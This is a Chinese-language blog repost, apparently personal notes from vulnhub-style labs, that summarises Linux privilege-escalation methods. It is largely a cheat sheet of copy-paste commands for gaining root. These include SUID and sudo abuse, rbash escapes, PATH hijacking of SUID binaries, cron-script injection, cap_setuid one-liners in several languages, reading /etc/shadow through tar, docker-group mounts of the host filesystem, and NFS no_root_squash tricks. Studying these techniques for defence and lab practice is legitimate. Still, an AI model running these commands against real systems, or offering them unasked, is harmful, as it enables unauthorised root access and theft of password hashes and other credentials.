|
Linux 提权总结ConsT27 [url=]HACK之道[/url] 今天
收录于话题
#提权2
#linux提权1
一. sudo 和 suid 提权1. 何为suid
可见在权限位置有一个s权限。那么这个s的作用是什么呢?
答案是当其他用户执行该文件时,该文件会以root的身份执行。
这里就涉及到了Effective UID和Real UID以及Saved UID
Effective UID: 程序实际操作时生效的UID
Real UID: 执行该程序的用户的实际UID
Saved UID: 在高权限用户降权后,保留的其原本UID (不展开说)
所以增加了一个s权限,该程序在实际运行时Effective UID就会变为0,即root的UID
2. sudo就是能把一个命令视作root来执行,用sudo-l查看可以被sudo的命令
3. SUID与sudo提权遍历目录中的suid文件- find / -perm -u=s 2>/dev/null
复制代码 执行该命令,会得到所有suid文件
用sudo -l 查看哪些命令能被sudo可利用于提权的命令nmap
使用nmap的udp或tcp syn扫描时,需要用到root权限,所以有些管理员图方便会直接给namp上s权限,而nmap 5.20(使用nmap -v查看nmap版本)之前有一个interactive交互模式(nmap –interactive),在nmap effective uid为0时,可以通过这个模式获得root权限交互式命令行,成功提权
- echo "os.execute('/bin/bash')" > ./shell
复制代码 全版本通杀提权,利用nmap可以执行指定文件的特点提权
find
find命令自带-exec参数,可以执行命令,若find有suid权限,那么使用exec相当于直接提权到root.
- 读文件 find /path -exec {} \;
复制代码 vim
vim有了suid就可以任意文件读取了
同时也可以输入 :shell
来获取root shell
bash
- bash -p 开启一个新shell,suid的话自然是开启root shell
复制代码
less,more
和vim差不多,任意文件读取,同时也可以输入 !command 进行提权到root
exim
exim在特定版本下会有suid提权
下载exp打就完事了
二. rbash 绕过1. 何为rbashrbash,是出于安全性考虑的一个功能受限的bash,我在vulnhub dc-2首次接触,他的限制性可能会有如下.
- cd 切换目录
- 含有斜杠 / 的命令, 譬如 /bin/sh
- 设置 PATH ENV 等环境变量
- 使用 > < 进行重定向
- binary 的运行. 通常 root 用户会手动创建 /bin/binary_file -> /home/rbash_user/bin/binary_file 的软链接, 限制性地提供部分 binary_file 给 rbash_user 使用 在 bash 下 echo $SHELL, 可以获取当前环境是否是 rbash.
2. bypassscp bypass我在http://www.const27.com/2020/07/02/vulnhub-dc-2/就是用scp绕的
3. 进入命令自带shell bypassman,git config help,more,less,vim,vi,ftp,gdb等命令都有自己的shell,我们只需在他们各自的shell中执行/bin/sh即可
一般都是在shell键入!/bin/sh来bypass rbash
下面这种方法也是可行的(似乎仅vim)
执行上面两个语句,就bypass了
4 find bypasss简单概括就是-exec执行一下/bin/bash …
5 编程语言 bypasspython
如果python都可以用的话,那就更轻松了,os安排一下
似乎pty也行?没试
- python -c "import os;os.system('/bin/bash')"
复制代码 php- php -a 进入php shell然后执行命令:exec("/bin/bash");
复制代码 perl
- perl -e 'exec "/bin/sh";'
复制代码 ruby
- ruby -e 'exec "/bin/bash"'
复制代码 6. cp bypass直接用cp把/usr/bin里的命令复制过来就行了
7. 直接更改PATH/SHELL变量键入export -p 查看该用户的变量
如果这俩变量有w权,那么我们可以直接写入来bypass
8. ssh bypass原理是通过ssh链接当前IP的当前用户并启动/bin/bash
- ssh username@Ip -t "/bin/bash"
复制代码 三. 内核提权用 uanme -a 查明内核版本
然后找exp打就完事了,内核提权的内容有点底层,暂时不用深入了解
四. passwd和shadow1. 明文密码/etc/passwd 默认所有用户可读,但只有root可写。
/etc/passwd里的用户口令往往以x代替,其加密后的密码会存入/etc/shadow里面,/etc/shadow默认只有root可读。
但是有小概率情况,明文密码就直接出现在/etc/passwd了,如果有这个情况且root密码暴露在了passwd里,那么就可以轻而易举提权了
2. passwd 可写如果/etc/passwd 我们当前用户可写,可以直接把root的密码改成一个明文密码,从而达到提权目的
3. 爆破shadow如果/etc/shadow 可读,我们可以用hashcat或者john暴力破解shadow文件
五. 计划任务1. 文件重写计划任务由crontab管理,非root用户是无法列出root用户的计划任务的,但我们可以列出/etc的系统任务,系统任务默认是root权限运行的
如果我们有幸有权限能更改其中一个任务指定的脚本,我们就可以往脚本里添加如反弹shell等指令,从而提权
2. 环境变量劫持我们查看定时任务
发现定义了诸多环境变量,如果其任务有未指定绝对路径的指令,如
而且我们在其环境变量路径中可以进行写入操作,那么我们可以通过写入环境变量的靠前路径一个同名恶意文件从而导致环境变量劫持
比如我们在/sbin 写入一个 反弹shell功能的shell.sh,那么就可以造成提权
3. 通配符提权https://www.secpulse.com/archives/72965.html 总结的太好了,我都不想记笔记了(偷懒
六. 环境变量如果我们找到一个suid权限的程序,但是我们无法完成suid提权,就可以试试搭配环境变量进行提权。
这个提权方法的思想是,找到有suid的,内部有system函数调用未指定路径的命令的文件。同时用户有修改自己环境变量的权限,
我们就可以通过劫持system函数里调用的脚本文件,使其指向我们环境变量里自行创建的一个同名脚本文件,那么这个我们自行创建的同名脚本文件就能以root权限运行了,如果这个脚本文件里的命令是/bin/bash,那么就相当于我们提权了。
可能有点小绕,看下面具体操作就行了。
实验室配置:
首先在一个目录下创建如下文件
然后 gcc demo.c -o shell 将其编译为可执行文件
然后 chmod u+s shell 为其增加suid权限
攻击者视角:
首先使用下列指令搜寻suid权限文件
- find / -perm -u=s -type f 2>/dev/null
复制代码
发现可疑目标,执行一下看看
发现返回了ps命令的结果,我们可以以此猜测这个文件内部 有 system(“ps”); 这条c语言代码。
遂可尝试环境变量提权
我们依次执行以下命令
- cd /tmp
- echo "/bin/bash" > ps
- export $PATH=/tmp:$PATH 需要修改自身环境变量的权限,但基本上都有这个权限
- chmod 777 ./ps 没这条命令会导致提权失败
- cd /home/const27
- ./shell 提权成功
复制代码
七. 密码查找这个提权技术说白了,就是去到处翻密码
文件内查找- grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
- find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
复制代码 我们可以通过以上命令,指定关键字,在所有文件中搜索内容中有关键字的文件。
查找十分钟内更改过的文件- find / -mmin -10 2>/dev/null | grep -Ev "^/proc" (不显示^/proc文件或文件夹)
复制代码 八. capabilitiescapabilities 是linux2.2后出现的产物,它的出现一定程度上弥补了suid这种粗糙的权限管理机制,但是capabilities 自身也有造成提权的安全隐患
1. 简介capabilities 把root的权限细分了,可以分别启用或者禁用。
在进行特权操作的时候,如果euid不是root,那么系统就会检查是否具有执行特权操作的对应capabilities ,并以此为凭据决定特权操作是否能被执行。
如下是一些常见的特权操作及其对应capabilities
关于capabilities的管理工具有如下:
- getcap
- setcap
- capsh
- filecap
getcap 用于查询capabilities,setcap用于设置capabilities,capsh用于查当前shell进程的capabilities,filecap既能设置又能查询。
我们可以通过以下指令搜索设置了capabilities的可执行文件
2. 实操通过cap_setuidcap_setuid 可以设置当前用户的euid,我们可以通过此选项来进行一些提权。
以python为例
我们发现python3.8 有cap_setuid权限,那么我们可以用以下指令进行提权
- python -c 'import os; os.setuid(0); os.system("/bin/sh")'
复制代码
类似的有很多。
perl
- perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
复制代码 gdb- gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
复制代码 php
- php -r "posix_setuid(0); system('/bin/sh');"
复制代码 python
- python -c 'import os; os.setuid(0); os.system("/bin/sh")'
复制代码 rvim
需要支持python3模块。
- rvim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
复制代码 vim
需要支持python3模块。vim --version查询,是否支持py3
- vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
复制代码 通过CAP_DAC_READ_SEARCHcap_dac_read_search可以绕过文件的读权限检查以及目录的读/执行权限的检查。
利用此特性我们可以读取系统中的敏感信息。
如果tar有此权限,我们可以通过此来查看敏感文件内容。
- tar cvf shadow.tar /etc/shadow //创建压缩文件
- tar -xvf shadow.tar //解压缩
- cd etc //进入解压缩的目录
- chmod +r shadow //赋予读权限
- cat shadow | grep root //查看shadow文件的内容
复制代码 九. DockerDocker用户组提权如果我们拿到了一个Docker用户组的用户权限,那么我们可以很轻松地完成提权
首先我们执行如下命令
- docker run -v /:/mnt --rm -it crf_web1 chroot /mnt sh
复制代码
然后在其中的/etc/passwd中写入一个root权限用户(我这里直接无密码了)
然后退出来,直接尝试 su root2
提权成功
十. NFSNFS 是一个用来共享目录的东西,但若配置权限不当则会引发安全问题
no_root_squash我们cat /etc/exports 如果有no_root_squash字样,则说明root用户就会对共享目录拥有至高的权限控制,就像是对本机的目录操作一样。
也就是说,任何机器的root在此目录上都有最高权限。
我们在获得一台机器的root权限后,可以通过nfs在另一台低权限机器上实现提权
- mkdir /tmp/nfs
- mount -o rw,vers=3 10.10.10.10:/tmp /tmp/nfs 将本机上的/tmp/nfs 挂载到共享目录
- cp /bin/bash /tmp/nfs/bash
- chmod u+s /tmp/nfs/bash 设置共享目录上bash的suid
复制代码 回到低权限机,执行 /tmp/bash 完成提权
作者:ConsT27,文章来源于https://www.const27.com/
|
|